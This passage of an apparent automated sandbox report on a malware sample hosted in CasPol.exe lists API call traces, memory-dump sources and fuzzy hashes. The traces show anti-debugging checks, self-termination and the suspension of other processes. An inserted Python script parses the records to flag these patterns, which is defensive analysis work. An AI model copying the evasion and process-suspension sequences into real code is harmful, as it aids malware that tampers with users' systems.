Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
• Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
• Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,1000A5B7), ref: 1000D9C9
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,1000A5B7), ref: 1000D9D3
• UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,1000A5B7), ref: 1000D9E0
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
• Instruction ID: 51d1529bf31c0dc1c591431ddb3d5b02b18bfdacfd507d32cf509de15b3658bd
• Opcode Fuzzy Hash: 9bf7030b23631355155973f3d1f9ef44914879ac124dcb0aa0168419693e3d91
• Instruction Fuzzy Hash: 1831B47590122DABDB21DF64D889B8DBBB4EF08350F5042EAE41CA7261EB309B858F55
APIs
• GetCurrentProcess.KERNEL32(?,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082,04582108,0000000C,04571F3A,?), ref: 04574AD5
• TerminateProcess.KERNEL32(00000000,?,04574A8A,?,04582238,0000000C,04574BBD,00000000,00000000,00000001,04572082,04582108,0000000C,04571F3A,?), ref: 04574ADC
• ExitProcess.KERNEL32 ref: 04574AEE
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 4345df17f3f3b285c9f73315482c9f88e3557dd5aee36937e7afc74fc5825ac2
• Instruction ID: cb5e3cbbca3c792da0e7e7647e1342e646eed1994815cdd603de48db86b93907
• Opcode Fuzzy Hash: 4345df17f3f3b285c9f73315482c9f88e3557dd5aee36937e7afc74fc5825ac2
• Instruction Fuzzy Hash: 9FE0B636000619AFDF116F65FD09A493B7AFF82355B108034F9098B121EB3AED4AEA54
APIs
• GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
• TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
• ExitProcess.KERNEL32 ref: 0044258E
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
• Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
• Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BDD
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BE4
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 10014BF6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                  • Instruction ID: deeea49242b6951bce6ccf9b122a28d0d79a9096b4b5a126c2a511b2d40dffe6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95c76ed56e18f89149474fb52f601925ff153df3b73455ff02c6b642b124ee7d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE0BF35004154FFDB01AF54CD99E483B69FB44291B114014F9055A132CF35ED93DA90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                                                                                                                                                                                                                                  • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1999457699-0
                                                                                                                                                                                                                                  • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                  • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                                                                                                                                                                                                                                  • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3614150671-0
                                                                                                                                                                                                                                  • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                  • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
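The three API records above (self-termination, then OpenProcess followed by NtSuspendProcess, then OpenProcess followed by NtResumeProcess, all in the CasPol.exe-hosted code of process 0xC) are the kind of call sequence a triage analyst wants to pull out of a long execution graph automatically. The script below is an added example and not part of the Joe Sandbox report or its tooling: it parses call lines in exactly the format the report prints ("• Api.MODULE(args), ref: ADDR", with the "Part of subcall function" prefix and the occasional non-hex argument such as "<D" handled), groups them per function, and flags an OpenProcess whose access mask includes PROCESS_SUSPEND_RESUME (0x800) when it is followed in the same function by NtSuspendProcess or NtResumeProcess from ntdll. The sample input is constructed by copying the report's own lines into the script; the rule names and severity wording are the editor's, not Joe Sandbox's.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: "APIs" records copied verbatim from the report
# entries for the CasPol.exe-hosted code (process 0xC). Any number of records
# in the same format can be pasted in instead.
SAMPLE_RECORDS = """\
APIs
• GetCurrentProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BDD
• TerminateProcess.KERNEL32(00000000,?,10014B92,00000000,10029B98,0000000C,10014CDA,00000000,00000002,00000000), ref: 10014BE4
• ExitProcess.KERNEL32 ref: 10014BF6
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
• NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
• CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
• NtResumeProcess.NTDLL(00000000), ref: 0041AD05
• CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
APIs
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
"""

# Process access right that OpenProcess must request for the handle to be
# accepted by NtSuspendProcess / NtResumeProcess.
PROCESS_SUSPEND_RESUME = 0x0800

# One call line: "• Api.MODULE(arg,arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR",
# optionally prefixed with "Part of subcall function XXXXXXXX:".
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]        # hex literals as int; '?' or inline strings as None
    ref: str                         # call-site address inside the dump
    subcall: Optional[str] = None    # address of the subcall function, if any


@dataclass
class Finding:
    kind: str
    call_site: str
    detail: str


def _arg(tok: str) -> Optional[int]:
    try:
        return int(tok.strip(), 16)
    except ValueError:               # '?' (unknown) or a string the sandbox rendered inline, e.g. "<D"
        return None


def parse_args(raw: Optional[str]) -> List[Optional[int]]:
    """'00000800,?,<D' -> [0x800, None, None]."""
    if raw is None or raw.strip() == "":
        return []
    return [_arg(t) for t in raw.split(",")]


def parse_records(text: str) -> List[List[Call]]:
    """Split report text into per-function call lists; each 'APIs' header opens a new function."""
    functions: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        line = line.strip()          # also tolerates the deep indentation of the exported page
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            current.append(Call(m["api"], m["module"].upper(), parse_args(m["args"]),
                                m["ref"].upper(), m["sub"]))
    return functions


def analyze(text: str) -> List[Finding]:
    """Flag suspend/resume of a foreign process and self-termination, per function."""
    findings: List[Finding] = []
    for calls in parse_records(text):
        for i, c in enumerate(calls):
            # A handle opened with PROCESS_SUSPEND_RESUME and then passed to the
            # ntdll-only Nt{Suspend,Resume}Process: freezing/thawing a whole process.
            if (c.api == "OpenProcess" and c.args and c.args[0] is not None
                    and c.args[0] & PROCESS_SUSPEND_RESUME):
                for later in calls[i + 1:]:
                    if later.module == "NTDLL" and later.api in ("NtSuspendProcess", "NtResumeProcess"):
                        findings.append(Finding(
                            "suspend_resume_process", later.ref,
                            f"OpenProcess(0x{c.args[0]:X}) at {c.ref} feeds {later.api}"))
            # TerminateProcess on the GetCurrentProcess pseudo-handle: plain self-exit,
            # low signal on its own, so it is reported only as context.
            if c.api == "TerminateProcess" and i > 0 and calls[i - 1].api == "GetCurrentProcess":
                findings.append(Finding("self_terminate", c.ref,
                                        "TerminateProcess on GetCurrentProcess handle"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print(f"{f.kind:24s} ref {f.call_site}: {f.detail}")
```

Run against the records above this yields one informational self_terminate at 10014BE4 and two suspend_resume_process hits, at 0041ACD9 (NtSuspendProcess) and 0041AD05 (NtResumeProcess). The access mask is the useful discriminator: 0x800 is exactly PROCESS_SUSPEND_RESUME and nothing else, so the caller asked for only what a suspend/resume needs, which is rarely what a legitimate debugger or installer requests.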
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: dc019d3839afe817ef14266546102a7d8419a999f5a14729737600e3da04615a
                                                                                                                                                                                                                                  • Instruction ID: e06f43740d574de246163a0288b6bedeb649657e7ec180becde07661268fdc22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc019d3839afe817ef14266546102a7d8419a999f5a14729737600e3da04615a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32314871900509AFDB249E38EC84EFA7BBDFB85324F4401BCE818D7251E630A945EB50
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                  • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                  • Instruction ID: c16af5c7ffbd8c4a49c204f9905b3b3e1e252fc171b94e42c608c02adf969b32
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873a04302784b116d8a99258add1453e79be975c542385aca68e1d7541cdf5be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D131F4B1904249ABDB14CE78CC84EEB7BBDDF86354F1402A9F519DB251E630EF858B50
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
• Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
• Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
• Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
• Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
• Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
• Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
• Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
• Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
• Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
• Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
• Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
• Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
• Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
• Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
• Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
• Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
• Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
• Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
• Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
